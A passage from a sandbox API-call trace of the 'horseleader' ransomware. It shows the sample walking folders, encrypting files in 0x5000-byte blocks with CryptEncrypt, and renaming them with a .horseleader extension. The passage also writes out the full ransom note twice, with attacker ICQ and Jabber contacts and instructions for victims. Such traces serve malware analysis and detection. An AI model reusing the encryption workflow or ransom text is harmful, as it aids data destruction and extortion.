lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.393] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.393] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.394] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa0c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.394] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.421] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.421] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.421] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.422] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.422] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.422] CloseHandle (hObject=0x1a4) returned 1 [0248.422] GetProcessHeap () returned 0x780000 [0248.422] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.422] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX.horseleader") returned 87 [0248.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\wt61es.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\wt61es.lex.horseleader")) returned 1 [0248.426] GetProcessHeap () returned 0x780000 [0248.426] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.426] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c79400, ftCreationTime.dwHighDateTime=0x1be6f42, ftLastAccessTime.dwLowDateTime=0x5ba5ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8c79400, ftLastWriteTime.dwHighDateTime=0x1be6f42, nFileSizeHigh=0x0, nFileSizeLow=0xa5c00, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WT61ES.LEX", cAlternateFileName="")) returned 0 [0248.426] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.426] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\#Decrypt#.txt") returned 78 [0248.426] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.427] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.427] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.428] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.428] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.428] CloseHandle (hObject=0x158) returned 1 [0248.428] GetProcessHeap () returned 0x780000 [0248.428] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.428] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FRAR", cAlternateFileName="")) returned 1 [0248.429] lstrcmpiW (lpString1="FRAR", lpString2="Windows") returned -1 [0248.429] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR") returned 64 [0248.429] lstrcmpW (lpString1="FRAR", lpString2=".") returned 1 [0248.429] lstrcmpW (lpString1="FRAR", lpString2="..") returned 1 [0248.429] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.429] GetProcessHeap () returned 0x780000 [0248.429] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.429] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*") returned 66 [0248.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.430] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.430] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\.") returned 66 [0248.430] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.430] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.430] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.430] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\..") returned 67 [0248.430] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.430] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.430] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21282c00, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7588f30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21282c00, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0x166bae, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1FRAR.ITS", cAlternateFileName="")) returned 1 [0248.430] lstrcmpiW (lpString1="MSB1FRAR.ITS", lpString2="Windows") returned -1 [0248.430] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS") returned 77 [0248.431] StrStrIW (lpFirst="MSB1FRAR.ITS", lpSrch=".horseleader") returned 0x0 [0248.431] lstrcmpW (lpString1="MSB1FRAR.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.431] lstrcmpW (lpString1="MSB1FRAR.ITS", lpString2="_uninstalling_.png") returned 1 [0248.431] lstrlenW (lpString=".testttjffg") returned 11 [0248.431] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS", lpSrch=".testttjffg") returned 0x0 [0248.431] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.431] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.431] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.432] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS") returned 77 [0248.432] StrStrW (lpFirst="MSB1FRAR.ITS", lpSrch=".txt") returned 0x0 [0248.432] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1469358) returned 1 [0248.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.432] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.434] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.435] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.436] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb0dd7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.436] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.438] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.438] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.439] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x161bae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.439] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.441] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.441] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.442] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.442] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.442] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.442] CloseHandle (hObject=0x1a4) returned 1 [0248.442] GetProcessHeap () returned 0x780000 [0248.442] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.443] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS.horseleader") returned 89 [0248.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its.horseleader")) returned 1 [0248.444] GetProcessHeap () returned 0x780000 [0248.444] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.444] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21282c00, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7588f30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21282c00, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0x166bae, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1FRAR.ITS", cAlternateFileName="")) returned 0 [0248.444] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.444] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\#Decrypt#.txt") returned 78 [0248.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.445] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.445] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.446] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.446] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.447] CloseHandle (hObject=0x158) returned 1 [0248.447] GetProcessHeap () returned 0x780000 [0248.447] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.447] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7516b10, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FREN", cAlternateFileName="")) returned 1 [0248.447] lstrcmpiW (lpString1="FREN", lpString2="Windows") returned -1 [0248.447] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN") returned 64 [0248.447] lstrcmpW (lpString1="FREN", lpString2=".") returned 1 [0248.447] lstrcmpW (lpString1="FREN", lpString2="..") returned 1 [0248.447] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.447] GetProcessHeap () returned 0x780000 [0248.448] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.448] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*") returned 66 [0248.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7516b10, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, 